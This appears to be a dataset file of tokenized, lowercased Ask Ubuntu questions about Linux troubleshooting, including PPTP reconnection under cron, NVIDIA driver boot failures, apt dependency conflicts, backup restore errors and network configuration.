448800	pptp wo n't connect from a cron command	i 'm trying to work out why my vpn wo n't connect when the command is initiated from a cron triggered script when that same script and command otherwise work as expected . i have a remote server which uses a secure vpn tunnel ( pptp ) to connect to a database behind our firewall . it 's quite a stable system ( especially with the persistent option set ) , and generally runs without any issue . however , from time to time the connection from our isp to our office drops out , and this disconnect is long enough to prevent the vpn tunnel from staying open . i 've set up a simple script to detect if the firewalled database is still available over the vpn and , if not , it attempts to reopen the vpn . # ! /bin/bash date=`date` host=10.1.2.1 ping_result=`ping -c4 $ host` # gets the percentage of lost packets ping_loss=`echo $ ping_result : | grep -op '\d+ ( ? = % packet loss ) '` echo `` $ date : loss result : $ ping_loss '' # if 100 % packet loss on the ping - assume connection lost if [ `` 100 '' -eq `` $ ping_loss '' ] ; then echo `` $ date : connection lost '' pon vpn_tunnel echo `` $ date : restarted connection '' else echo `` $ date : connection ok '' fi i 've saved the script as /root/cron/pptp-monitor and set the permissions as -rwxr -- r -- root root the script works great when run manually ( using sudo ) - but the cron i 've configured does n't work properly : */5 * * * * root [ -x /root/cron/pptp-monitor ] & & /root/cron/pptp-monitor > > /var/log/pptp-monitor.log 2 > & 1 the monitor script runs - i see the log entries every 5 minutes - but the pon command does n't actually seem to fire off . in the syslog , i see this every 5 minutes : apr 17 08:45:01 bombur cron [ 774 ] : ( root ) cmd ( [ -x /root/cron/pptp-monitor ] & & /root/cron/pptp-monitor > > /var/log/pptp-monitor.log 2 > & 1 ) apr 17 08:45:14 bombur pppd [ 784 ] : pppd 2.4.5 started by root , uid 0 apr 17 08:45:14 bombur pppd [ 784 ] : using interface ppp0 apr 17 08:45:14 bombur pppd [ 784 ] : connect : ppp0 < -- > /dev/pts/0 apr 17 08:45:14 bombur pppd [ 784 ] : modem hangup apr 17 08:45:14 bombur pppd [ 784 ] : connection terminated . the lines `` using interface ppp0 '' to `` connection terminated '' are repeated 10 times before exit - indicating that the tunnel is trying to reopen unsuccessfully . note - the network connection is fine by this time , and as soon as i run the command manually , it connects on the first attempt . what did i miss that is causing the cron trigger to prevent the vpn connection ?
448802	nvidia graphic not allowing boot	hello and welcome to the toughest question on the internet ! brought to you today by this machine : toshiba qosmio x505-q830 core i7 720qm , 4gb ddr3 , 320gb hdd , nvidia gts 250m . i have tried installing ubuntu 12.04 desktop 64bit and linux mint 16 petra w/ cinnamon both produced same results . i am not dual-booting this with anything else , attempting to use a single os ( linux ) . in order to run the liveusb i have to boot with `` nomodeset '' , once booted into the liveusb install runs perfect and asks for reboot . i reboot , add nomodeset to grub and go from there . do a update & & upgrade . install `` additional drivers '' for nvidia ( tried both version 331 and 309 ) , after install i am asked to reboot , i reboot this time without nomodeset and i get a black screen with no activity . force a shutdown , try to reboot with `` nomodeset '' and same frozen deal . all of the above repeat with identical results and error messages across ubuntu and linux mint . below are a few links that may help : dmesg , syslog , kern , xorg.0 log files - https : //www.dropbox.com/sh/r6hjkuflhwoikae/nqs5ek7qxv system specs as per toshiba and verified by me - http : //support.toshiba.com/support/staticcontentdetail ? contentid=2428599 & isfromtoclink=false bios version currently installed is latest available from toshiba support ( v 2.90 )
448803	deja dup gives `` invalid or incomplete multibyte or wide character '' when attempting to restore from backup	i 've been backing up weekly with deja dup in 13.10 . after making a fresh backup , i formatted the drive and installed the ubuntu 14.04 beta . now , when attempting to restore , deja dup asks twice for sudo access ( â˝ ) and then later fails with this error : traceback ( most recent call last ) : file `` /usr/bin/duplicity '' , line 1494 , in < module > with_tempdir ( main ) file `` /usr/bin/duplicity '' , line 1488 , in with_tempdir fn ( ) file `` /usr/bin/duplicity '' , line 1337 , in main do_backup ( action ) file `` /usr/bin/duplicity '' , line 1422 , in do_backup restore ( col_stats ) file `` /usr/bin/duplicity '' , line 697 , in restore restore_get_patched_rop_iter ( col_stats ) ) : file `` /usr/lib/python2.7/dist-packages/duplicity/patchdir.py '' , line 538 , in write_ropaths itr ( ropath.index , ropath ) file `` /usr/lib/python2.7/dist-packages/duplicity/lazy.py '' , line 335 , in __call__ last_branch.fast_process , args ) file `` /usr/lib/python2.7/dist-packages/duplicity/robust.py '' , line 37 , in check_common_error return function ( *args ) file `` /usr/lib/python2.7/dist-packages/duplicity/patchdir.py '' , line 591 , in fast_process ropath.copy ( self.base_path.new_index ( index ) ) file `` /usr/lib/python2.7/dist-packages/duplicity/path.py '' , line 521 , in new_index return self.__class__ ( self.base , index ) file `` /usr/lib/python2.7/dist-packages/duplicity/path.py '' , line 497 , in __init__ self.setdata ( ) file `` /usr/lib/python2.7/dist-packages/duplicity/path.py '' , line 502 , in setdata self.stat = os.lstat ( self.name ) oserror : [ errno 84 ] invalid or incomplete multibyte or wide character : '/media/ [ user ] /seagate backup plus drive/restoredbackup3/home/ [ user ] /.local/share/geary/ [ my email address ] /attachments/1915/90/\xd0\xc2\xd0\xce\xca\xc6\xcf\xc2\xd3\xc3\xb9\xa4\xb7\xe7\xcf\xd5\xb7\xc0\xb7\xb6\xd3\xeb\xc0\xcd\xb6\xaf\xd5\xf9\xd2\xe9\xb4\xa6\xc0\xed.txt' i 'm mostly trying to restore my shotwell library database , since i have other backups of pretty much everything else . i 'm actually restoring the backup to the backup drive itself , since i do n't have ~350gb of free space on my internal drive . can anyone help me a ) resolve the error and complete the backup ; b ) ignore the error and complete the backup ; or c ) cherry-pick ~/.local/share/shotwell for restoration without attempting to restore anything else ?
448804	can not scp/rsync into live cd	i 'm trying to scp into a box running 12.04 32bit livecd . the machines are connected to same switch & can ping each other just fine . i use the usual args , eg- scp -rp 'ubuntu @ 192.168.1.101 : /home/ubuntu/desktop/somefiletocopy.zip ' . but keep getting connection refused on port 22 . its my understanding port 22 is open on livecd so i can not figure out what the problem is.. thanks for any help with this .
448805	how to copy the text in ubuntu error window ?	i 'm using xubuntu 14.04 64 bit , vlc media player 2.1.2 rincewind ( revision 2.1.2-0-ga4c4876 ) . vlc crashes on startup and gives this error 12836 segmentation fault ( core dumped ) vlc while that message may be enough i 'd like to copy the text shown here in order to open a bug report and make sure that the dev team has more than enough information on what 's going on ( select all - > copy ) it 's impossible to take screenshot of the whole window , it 's just too big , i 'm sure that these errors are in some logs somewhere . but i 'd like to know how to copy them right from that window . i also know that i could just send the error by ticking the checkbox and the dev team will be notified , but i 'd like to manually open a ticket and communicate with them . if there 's one thing i hate about computers it 's bots , bots everywhere , no need for communication anymore ! even if the vlc error is easy to fix , and even if it 's not really a bug , i still would like to know how to copy the text .
448806	dependency issues preventing update	i 'm trying to do routine software upgrades but made the mistake a while back of installing acestream : i386 , which broke a fair amount of stuff . when i run apt-get upgrade , i get the following : e : unmet dependencies . try using -f. no files to download . reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : acestream : i386 : depends : python2.7 : i386 ( > = 2.7.2 ) but it is not installed depends : python2.7-apsw : i386 depends : python2.7-m2crypto : i386 depends : python-appindicator : i386 ( > = 0.4.1 ) but it is not installed depends : liba52-0.7.4 : i386 but it is not installed depends : libass4 : i386 ( > = 0.9.7 ) but it is not installed depends : libavcodec53 : i386 ( > = 4:0.7-1 ) but it is not installed or libavcodec-extra-53 : i386 ( > = 4:0.7-1 ) but it is not installed depends : libavformat53 : i386 ( > = 4:0.7-1 ) but it is not installed or libavformat-extra-53 : i386 ( > = 4:0.7-1 ) but it is not installed depends : libavutil51 : i386 ( > = 4:0.7-1 ) but it is not installed or libavutil-extra-51 : i386 ( > = 4:0.7-1 ) but it is not installed depends : libcddb2 : i386 but it is not installed depends : libcdio10 : i386 but it is not installable or libcdio13 : i386 but it is not installed depends : libdc1394-22 : i386 but it is not installed depends : libdca0 : i386 but it is not installed depends : libdirac-encoder0 : i386 but it is not installed depends : libdvbpsi7 : i386 ( > = 0.2.0 ) but it is not installed depends : libdvdnav4 : i386 but it is not installed depends : libdvdread4 : i386 but it is not installed depends : libebml3 : i386 but it is not installed depends : libfaad2 : i386 but it is not installed depends : libfribidi0 : i386 ( > = 0.19.2 ) but it is not installed depends : libqt4-webkit : i386 but it is not installed depends : libkate1 : i386 ( > = 0.3.0 ) but it is not installed depends : liblircclient0 : i386 but it is not installed depends : liblua5.1-0 : i386 but it is not installed depends : libmatroska5 : i386 but it is not installed or libmatroska4 : i386 but it is not installable depends : libmodplug1 : i386 but it is not installed depends : libmpcdec6 : i386 ( > = 1:0.1~r435 ) but it is not installed depends : libmpeg2-4 : i386 but it is not installed depends : libmtp9 : i386 ( > = 1.1.0 ) but it is not installed depends : libpostproc52 : i386 ( > = 4:0.7-1 ) but it is not installed or libpostproc-extra-52 : i386 ( > = 4:0.7-1 ) but it is not installed depends : libschroedinger-1.0-0 : i386 ( > = 1.0.7 ) but it is not installed depends : libsmbclient : i386 ( > = 3.0.24 ) but it is not installed depends : libswscale2 : i386 ( > = 4:0.7-1 ) but it is not installed or libswscale-extra-2 : i386 ( > = 4:0.7-1 ) but it is not installed depends : libtar0 : i386 but it is not installed depends : libtwolame0 : i386 but it is not installed depends : libupnp6 : i386 but it is not installable or libupnp4 : i386 but it is not installed or libupnp3 : i386 but it is not installed depends : libva-x11-1 : i386 ( > 1.0.12~ ) but it is not installed depends : libva1 : i386 ( > 1.0.12~ ) but it is not installed depends : libvcdinfo0 : i386 ( > 0.7.23 ) but it is not installed depends : libx264-116 : i386 but it is not installable or libx264-120 : i386 but it is not installed or libx264-123 : i386 but it is not installable depends : ttf-freefont : i386 but it is not installable libudev0 : breaks : libudev0 : i386 ( ! = 175-0ubuntu9.4 ) but 175-0ubuntu13 is installed libudev0 : i386 : breaks : libudev0 ( ! = 175-0ubuntu13 ) but 175-0ubuntu9.4 is installed e : unmet dependencies . try using -f. if i run apt-get -f install it apparently wants to uninstall the bulk of the software on my system : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : xbmc-pvr-mythtv-cmyth libsdl-ttf2.0-0 : i386 libgconf-2-4 : i386 libatk1.0-0 : i386 libstdc++5 : i386 libgail18 : i386 libao-common libqt4-qt3support : i386 libcupsimage2 : i386 libjs-mochikit libnss3 : i386 libcaca0 : i386 gtk2-engines : i386 xbmc-pvr-nextpvr par2 libcairo-gobject2 : i386 libavc1394-0 : i386 liblockdev1 xbmc-pvr-vuplus libmicrohttpd5 linux-headers-3.2.0-48 libaio1 : i386 odbcinst1debian2 : i386 libvlccore-dev libqt4-test : i386 libqt4-designer : i386 libsdl-mixer1.2 : i386 libtinyxml2.6.2 libcap2 : i386 libproxy1 : i386 ibus-gtk : i386 libdbus-glib-1-2 : i386 libtdb1 : i386 libcec2 libspeex1 : i386 xbmc-pvr-dvbviewer libibus-1.0-0 : i386 libcairo2 : i386 libjs-excanvas libshairport1 libcanberra0 : i386 gtk2-engines-murrine : i386 libwavpack1 : i386 libqt4-opengl : i386 libsoup-gnome2.4-1 : i386 librsvg2-common : i386 libiec61883-0 : i386 libgdk-pixbuf2.0-0 : i386 libsdl-image1.2 : i386 libpixman-1-0 : i386 libsdl1.2debian : i386 libxaw7 : i386 libgdbm3 : i386 libcurl3 : i386 linux-headers-3.2.0-48-generic libesd0 : i386 libmikmod2 : i386 xbmc-pvr-vdr-vnsi libxft2 : i386 swig libpulse-mainloop-glib0 : i386 libaa1 : i386 xbmc-pvr-argustv libao4 libao4 : i386 liblzo2-2 libxmu6 : i386 libcanberra-gtk0 : i386 esound-common libgail-common : i386 libraw1394-11 : i386 libnspr4 : i386 libshout3 : i386 libdv4 : i386 libqtassistantclient4 gstreamer0.10-x : i386 libxss1 : i386 xbmc-pvr-tvheadend-hts libsdl-net1.2 : i386 libjasper1 : i386 libgnome-keyring0 : i386 libxtst6 : i386 gtk2-engines-pixbuf : i386 sabnzbdplus-theme-plush libtag1c2a : i386 librsvg2-2 : i386 xbmc-pvr-njoy libmad0 : i386 libvlc-dev gtk2-engines-oxygen : i386 xaw3dg : i386 libpango1.0-0 : i386 libpulsedsp : i386 libqt3-mt xbmc-pvr-mediaportal-tvserver libxcb-render0 : i386 libodbc1 : i386 libqt4-scripttools : i386 librtmp0 : i386 swig2.0 libxp6 : i386 libxcb-shm0 : i386 libxv1 : i386 libnfs1 libgtk2.0-0 : i386 libtidy-0.99-0 libshairplay0 glib-networking : i386 libsoup2.4-1 : i386 libtag1-vanilla : i386 libaudiofile1 : i386 libsmbclient : i386 libqt4-webkit : i386 libavutil51 : i386 libpostproc52 : i386 libswscale2 : i386 libupnp4 : i386 libtalloc2 : i386 libwbclient0 : i386 liblua5.1-0 : i386 libva1 : i386 libdc1394-22 : i386 libva-x11-1 : i386 libtar0 : i386 libx264-120 : i386 libebml3 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libavcodec53 libavformat53 libavutil51 libavutil51 : i386 libdc1394-22 : i386 libebml3 : i386 libgail-3-0 libgtk-3-0 libgtk-3-bin libgtk-3-common liblua5.1-0 : i386 libpostproc52 libpostproc52 : i386 libpython3.2 libqt4-webkit : i386 libsmbclient libsmbclient : i386 libswscale2 libswscale2 : i386 libtalloc2 : i386 libtar0 : i386 libupnp4 : i386 libva-x11-1 : i386 libva1 : i386 libwbclient0 libwbclient0 : i386 libx264-120 : i386 python3 python3-minimal python3-uno python3.2 python3.2-minimal suggested packages : python3-doc python3-tk python3.2-doc binfmt-support the following packages will be removed : acestream : i386 activity-log-manager-control-center aisleriot apparmor apport apport-gtk apt-xapian-index aptdaemon apturl apturl-common bluez bluez-alsa bluez-alsa : i386 bluez-gstreamer checkbox checkbox-qt command-not-found compiz compiz-gnome compiz-plugins-main-default compizconfig-backend-gconf deja-dup duplicity eog evolution-data-server firefox firefox-globalmenu firefox-gnome-support flashplugin-installer foomatic-db-compressed-ppds gconf2 gdb gedit gir1.2-peas-1.0 gir1.2-rb-3.0 gir1.2-totem-1.0 gir1.2-ubuntuoneui-3.0 gksu gnome-bluetooth gnome-control-center gnome-media gnome-menus gnome-orca gnome-sudoku gnome-terminal gnome-terminal-data gnome-user-share gstreamer0.10-gconf gstreamer0.10-plugins-good : i386 gvfs : i386 gwibber gwibber-service gwibber-service-facebook gwibber-service-identica gwibber-service-twitter hplip hplip-data hugin hugin-data hugin-tools ia32-libs ia32-libs-multiarch : i386 ibus ibus-pinyin ibus-table indicator-application indicator-datetime indicator-power jockey-common jockey-gtk landscape-client-ui-install language-selector-common language-selector-gnome launchpad-integration libappindicator1 libcanberra-gtk-module libcanberra-gtk-module : i386 libcanberra-gtk3-module libcompizconfig0 libfolks-eds25 libgksu2-0 libgnome-media-profiles-3.0-0 libgnome2-common libgudev-1.0-0 : i386 libgweather-3-0 libgweather-common libgwibber-gtk2 libgwibber2 libindicator7 libmetacity-private0 libpeas-1.0-0 libpurple-bin libpython2.7 libqt4-webkit libreoffice-gnome librhythmbox-core5 libsyncdaemon-1.0-1 libtar0 libtotem0 libubuntuoneui-3.0-1 libudev0 : i386 light-themes lsb-release m64py metacity metacity-common nautilus-share netflix-desktop network-manager-gnome nvidia-common onboard oneconf openprinting-ppds pipelight pipelight-multi printer-driver-foo2zjs printer-driver-postscript-hp printer-driver-ptouch printer-driver-pxljr printer-driver-sag-gdi printer-driver-splix python python-appindicator python-apport python-apsw python-apt python-aptdaemon python-aptdaemon.gtk3widgets python-aptdaemon.pkcompat python-bluez python-brlapi python-cairo python-central python-chardet python-cheetah python-configglue python-configobj python-crypto python-cups python-cupshelpers python-dateutil python-dbus python-debian python-debtagshw python-defer python-dev python-dirspec python-egenix-mxdatetime python-egenix-mxtools python-feedparser python-gconf python-gdbm python-gi python-gi-cairo python-glade2 python-gnomekeyring python-gnupginterface python-gobject python-gobject-2 python-gst0.10 python-gtk2 python-httplib2 python-ibus python-imaging python-keyring python-launchpadlib python-lazr.restfulclient python-lazr.uri python-libproxy python-libxml2 python-louis python-m2crypto python-mako python-markupsafe python-minimal python-notify python-oauth python-opengl python-openssl python-packagekit python-pam python-pexpect python-pip python-piston-mini-client python-pkg-resources python-problem-report python-protobuf python-pyatspi2 python-pycurl python-pyinotify python-pyudev python-pyxattr python-qt3 python-qt4 python-qt4-gl python-renderpm python-reportlab python-reportlab-accel python-serial python-setuptools python-simplejson python-sip python-smbc python-software-properties python-speechd python-support python-twisted-bin python-twisted-core python-twisted-names python-twisted-web python-ubuntu-sso-client python-ubuntuone-client python-ubuntuone-control-panel python-ubuntuone-storageprotocol python-uno python-utidylib python-virtkey python-wadllib python-xapian python-xdg python-xkit python-yenc python-zeitgeist python-zope.interface python2.7 python2.7-dev python2.7-minimal rhythmbox rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-magnatune rhythmbox-plugin-zeitgeist rhythmbox-plugins rhythmbox-ubuntuone sabnzbdplus sabnzbdplus-theme-classic sabnzbdplus-theme-mobile sabnzbdplus-theme-smpl sessioninstaller software-center software-center-aptdaemon-plugins software-properties-common software-properties-gtk solaar sopcast-player sp-auth steam : i386 steam-launcher system-config-printer-common system-config-printer-gnome system-config-printer-udev totem totem-mozilla totem-plugins ttf-mscorefonts-installer ubuntu-artwork ubuntu-desktop ubuntu-minimal ubuntu-sso-client ubuntu-sso-client-gtk ubuntu-standard ubuntu-system-service ubuntuone-client ubuntuone-client-gnome ubuntuone-control-panel ubuntuone-couch ubuntuone-installer ufw unattended-upgrades unity unity-2d unity-common unity-lens-applications unity-lens-video unity-scope-musicstores unity-scope-video-remote update-manager update-manager-core update-notifier update-notifier-common usb-creator-common usb-creator-gtk vlc wine-browser-installer wine-silverlight4-installer wine-silverlight5.1-installer xbmc xbmc-bin xdiagnose xul-ext-ubufox zeitgeist zeitgeist-core zeitgeist-datahub the following new packages will be installed : libavutil51 : i386 libdc1394-22 : i386 libebml3 : i386 liblua5.1-0 : i386 libpostproc52 : i386 libpython3.2 libqt4-webkit : i386 libsmbclient : i386 libswscale2 : i386 libtalloc2 : i386 libtar0 : i386 libupnp4 : i386 libva-x11-1 : i386 libva1 : i386 libwbclient0 : i386 libx264-120 : i386 python3 python3-minimal python3-uno python3.2 python3.2-minimal the following packages will be upgraded : libavcodec53 libavformat53 libavutil51 libgail-3-0 libgtk-3-0 libgtk-3-bin libgtk-3-common libpostproc52 libsmbclient libswscale2 libwbclient0 warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! python-minimal python2.7-minimal ( due to python-minimal ) 11 upgraded , 21 newly installed , 293 to remove and 146 not upgraded . 3 not fully installed or removed . need to get 18.1 mb of archives . after this operation , 517 mb disk space will be freed . you are about to do something potentially harmful . to continue type in the phrase 'yes , do as i say ! ' if i try to uninstall just acestream : i386 i get the following error : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libudev0 : breaks : libudev0 : i386 ( ! = 175-0ubuntu9.4 ) but 175-0ubuntu13 is to be installed libudev0 : i386 : breaks : libudev0 ( ! = 175-0ubuntu13 ) but 175-0ubuntu9.4 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i really have no clue where to go from here .
448810	how may user account disappear ?	my user account has disappeared from a computer with ubuntu server 12.04 . i discovered this by trying to ssh to it , and the owner of this machine confirmed that my user was gone by attempting to `` su user '' ( my home folder was still there , though , with all it 's files ) . the account was recently set using terminal commands and the only thing that happened ( that i could identify as probable cause ) between then and now was that the computer was turned off and on . the owner of the computer also complained of trying to change his password only to have it reset itself back to the previous one ( i was n't told if this happened immediately or also after restarting the machine ) . any idea on what is happening ? is it possible that some routine is overwriting the files where user information is stored when the computer starts ?
448811	ubuntu server 12.04 made into squashfs ( toram ) and frequent start-up kernel panics	i 've got a ubuntu server 12.04 64-bit packed into squashfs and booting into ram using toram option . when i reboot the machine i get a kernel panic 3 out of 5 times , sometimes multiple times in row , but then it will eventually just work . this is the error that i get : target filesystem does n't have requested /sbin/init . run-init : opening console : no such file or directory kernel panic - not syncing : attempted to kill init ! exitcode=0x00000100 well , obviously /sbin/init does exist as sometimes the system loads without any issue with no changes to anything whatsoever . moreover the machine is brand new and memtest suggests there 's no issue with the ram itself . here is how my setup was prepared : i 've compiled ubuntu-3.11.0-18.32 kernel with built-in aufs and squashfs support on an external 64-bit ubuntu server 12.04 virtualbox vm . the kernel was installed on target machine and i 've made a squashfs out of a copy of the filesystem with -always-use-fragments option . i 've installed debian 's live-boot-3.0.1-1 scripts in order to be able to boot the squashfs to ram . the grub menu entry looks like this : menuentry 'ubun2ram ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { linux /boot/vmlinuz- $ ( uname -r ) boot=live boot=live toram=filesystem.squashfs rw quiet splash apparmor=0 security= '' '' $ vt_handoff kernel.panic=1 initrd /boot/initrd.img- $ ( uname -r ) } this is based on the ubun2ram guide available at http : //roadha.us/2013/01/resilient-ubuntu-boot-to-ram-usb-stick/ , the main difference being that in my case the `` thumb box '' and `` target '' is one ubuntu server installation . i 've tried to either find out what 's causing the kernel panics or to force the system to restart upon encountering one by passing kernel.panic=1 as a boot parameter or by putting the same into /etc/sysctl.conf.the problem is that i ca n't view any logs from a failed start-up attempt ( as the system boots into ram ) and the system never reboots after a kernel panic occurs ( despite having configured it that way , or so i thought ) .an ideal solution would be to get rid of the kernel panics , however i 'd be satisfied with having the system reboot when a kernel panic occurs . any input is appreciated.mjd
448812	oneconf eating up memory while in chrome	when i look at the dependencies in synaptic , it shows ubuntu desktop , and software center as being dependent on oneconf , and i do not wish to remove these . however whenever i get to a page which has likability to social media sites ( like facebook , google + , pintrest , etc . ) my oneconf ends up jumping up to anywhere from 100 mib usage to 700 mib usage . i only have 2 gig of ram , so this really hits hard on my performance . if i stop/end/kill the process it comes back again , which i expect , but it works temporarily . can i remove this without breaking ubuntu ? if not is there any workaround someone can think of ?
448814	download images using wget	http : //i10.mangareader.net/highschool-dxd/18/highschool-dxd-3449409.jpg how do download images using wget with the url , only that it disregards the name and only downloads if it is jpg/png ... i already tried : wget -r -a `` jpg , png '' http : //i10.mangareader.net/highschool-dxd/18/ and it returns forbidden ... any suggestions ? keep in mind that i 'm very new to this kind of thing .
448816	google chrome manage certificates	i go to google settings- > certificate manager- > your certificates tab and it says : you have certificates from these organizations that identify you : myemailaddress.gmail.com , obviously not my real email address . it obviously want 's me to import something here . it opens my home directory when i hit import button that it displays . from seahores/ubuntu it says mymailaddress @ gmail.com is a personal pgp key under the gnupg keys section . i think i set it up a while back to use for encrypted mail in thunderbird under properties in seahorse it says mymailaddress @ gmail.com use : decript files and email sent you when seahorse exports it it gives me xxxxx.asc file and inside it is a private key when opening it with an editor what do you think chrome browser is looking for me to import into your certificates tap ?
448818	ca n't find packages , ubuntu 13.10	i 'm trying to install wine 1.6 but the terminal keeps saying it ca n't find the packages . and when i tried to add it to the repository it says i 'm not using the correct ppa name . sudo add-apt-repository ppa : wine1.6/stable can not add ppa : 'ppa : wine1.6/stable ' . please check that ppa name or format is correct .
448820	ubuntu server 12.04 lts network problem	ok everyone , i am `` sorta '' new to ubuntu and am now running a ubuntu 12.04 lts server . i did a basic install of 12.04 lts 64-bit . after initial boot i logged in and ran 'sudo apt-get update ' . after this i installed 'ubuntu-desktop ' and 64-bit oracle jre . i have configured my static ip using the terminal . everything was running great until i shutdown this morning to upgrade its ram . the new ram is installed now and the server is running , but now network manager ( ugh ) is showing no wired connections . i have scoured the internet for a solution and have yet to find anything wrong with my settings . i have the server kvm 'd to my main desktop pc , and am writing this from that pc . unfortunately , this makes it hard to copy paste from the server . i will provide any further information needed . : ~ $ ifconfig eth0 link encap : ethernet hwaddr fc:4d : d4 : f5:77:4e inet addr:10.1.10.100 bcast:10.1.10.255 mask:255.255.255.0 inet6 addr : fe80 : :fe4d : d4ff : fef5:774e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:380 errors:0 dropped:0 overruns:0 frame:0 tx packets:120 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:43114 ( 43.1 kb ) tx bytes:17701 ( 17.7 kb ) interrupt:20 memory : f7c00000-f7c20000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:4640 errors:0 dropped:0 overruns:0 frame:0 tx packets:4640 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:371208 ( 371.2 kb ) tx bytes:371208 ( 371.2 kb ) /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface # auto lo # iface lo inet loopback # the primary network interface auto eth0 iface lo inet loopback iface eth0 inet static address 10.1.10.100 netmask 255.255.255.0 gateway 10.1.10.1 /etc/resolve.conf is appearently empty now.. must have been reset by network manager ... /etc/networkmanager/networkmanger.conf is also empty ... i opened this to change it to : [ ifupdown ] manual=true since i read on ubuntu forums that i needed to do it in order to stop network manager from interfering with my manually configured terminal settings . i am not sure why it is an empty file ... one last thing for now , let me explain what i meant by `` everything was running great '' . i am running a minecraft server from this machine , it has been running and functioning properly until the shutdown today , and should continue to run after i fix this connection problem . by functioning properly i mean , this morning when i logged in to shut it down , my internet connection was still valid and working and i was still able to connect into the minecraft server from an external ip . i shutdown this morning , removed the ram and doubled it , upon initial boot i am now stuck with this problem of no internet , yet every command i run appears to show the static is fine and i should n't have a problem . thank you for your help and answers .
448821	can not sign into facebook - ubuntu 13.10	ubuntu 13.10 can not properlly sign into facebook from `` system settings > online accounts '' or empathy when i attempt to sign in , it 's already logged into my account but then it says facebook can not authorize ubuntu
448822	creating and signing local repository ( debian )	at all , what and how should i download ? i386 and amd64 together or only which will fit my architecture ? and how to sign ? there are 3 folders : mirror , skel , var . which of those should i sign ? originally in russian .
448824	western digital my book 3tb drive not recognised in ubuntu 12.04 server	i notice a few similar problems but nothing that works for me . i have a wd 3tb drive which works fine on my windows pc . if i plug it into a usb 2 port on the ubuntu server ( 12.04 ) then lsusb shows the drive and so does parted . however if i plug it into a usb 3.0 port then lsusb shows the following but parted shows nothing . bus 001 device 002 : id 8087:8008 intel corp . bus 002 device 002 : id 8087:8000 intel corp . bus 004 device 002 : id 1f75:0902 bus 004 device 051 : id 1058:1140 western digital technologies , inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub a different usb drive plugged into the same port works fine . dmesg | tail shows : - [ 833.234093 ] usb 4-6 : new superspeed usb device number 24 using xhci_hcd [ 833.250669 ] usb 4-6 : new usb device found , idvendor=1058 , idproduct=1140 [ 833.250678 ] usb 4-6 : new usb device strings : mfr=1 , product=2 , serialnumber=5 [ 833.250683 ] usb 4-6 : product : my book 1140 [ 833.250688 ] usb 4-6 : manufacturer : western digital [ 833.250691 ] usb 4-6 : serialnumber : 574341575a30393939323938 [ 833.251572 ] usb-storage 4-6:1.0 : usb mass storage device detected [ 833.251693 ] scsi29 : usb-storage 4-6:1.0 [ 834.418520 ] usb 4-6 : usb disconnect , device number 24 i donât understand why it seems to be disconnected at the end . any help would be gratefully received .
448836	how do i with ufw deny all outgoing ports excepting the ones i need ?	i did the following : ufw default deny outgoing , sudo ufw allow out 80 which i thought would let me use the internet but did n't can y'all help ? also are there any other ports used by ubuntu for which i should allow outgoing traffic for ? i hear these 20 , 21 , 53 , 123 , 443 are some what do you all think ? thanks
448837	windows xp desktop , cd drive and no usb boot option	i have a dell 2400 inspiron system with a cd drive . lately its become sluggish in operation and i decided to load kubuntu on it . but i have run into a roadblock . my machine does n't have the usb flash boot option ( checked the bios option and not possible ) and i am not able to burn a cd with the iso image as its size is smaller than what the boot image requires . how do i get kubuntu on my desktop ? is there any other way ? thanks .
448839	installing ubuntu in shrinked unallocated space	i have installed ubuntu in my laptop and now i want to install ubuntu in my pc also but there are four partition in my windows so i ca n't use install ubuntu alongside option . so my plan is to shrink my c drive and create an unallocated space . my question is can i use something else option now ? can i delete that unallocated space and create new drive to install ubuntu ?
448841	uninstall ubuntu 13.10	i downloaded ubuntu 13.10 so that i could remove the administrator password on my laptop since i forgot it.i was in `` try ubuntu '' mode while trying to recover/reset the password , but i kept running into issues . i hit `` install '' the next time , went through the steps up to the part where it did n't give me an option to install alongside windows vista . i just installed it and it brought me to the `` disk/partition '' part of the install . i used my hard-drive ( /dev/sda3 ) . since then , i have not been able to use windows vista . please advise how to uninstall ubuntu 13.10 and revert the changes . thanks ! i would like to remove ubuntu 13.10 from my windows partition /dev/sda3 . how would i do this ? will it revert the partition back to windows vista ? please advise . thanks ! update : instead of trying to uninstall ubuntu 13.10 i just decided to complete the following steps to get windows vista back on the correct partition . logged into ubuntu 13.10 and changed drives/partitions to nfts in `` disk '' download wintoflash [ here ] followed the instructions [ here ] after installing windows vista via usb my operating system was back up and running !
448842	can i view the history of connected usb ?	i do n't know ubuntu or other linux distribution would record the connected usb information or not . i mean does ubuntu record the usb information as i plug it into the pc , when i plug it out , does the record remains in system ? if yes , where is the log ? if not , can i do this ?
448844	finding installed software	since i have not been able to open dash home in 12.04.4 see dash home will not open , i am hoping for a work-around . is there another convenient way to open apps/programs without having to search through folders ? is this question clear enough ? for example , i just installed kile ( publishing program ) from the software center , but i ca n't find a link/tile/icon/shortcut to open it . thanks , to whomever can help .
448846	how do i change resolution ?	i 'm using 1024x768 but i want to change to 1280x800 resolution . this is n't detected by os so i found if i put the following into /etc/x11/xorg.conf it could work but it did n't . how do i fix this ? i tried to install some application from software center like arand but it did n't even started . section `` device '' identifier `` configured video device '' endsection section `` monitor '' identifier `` configured monitor '' endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' subsection `` display '' modes `` 1280x800 '' endsubsection endsection
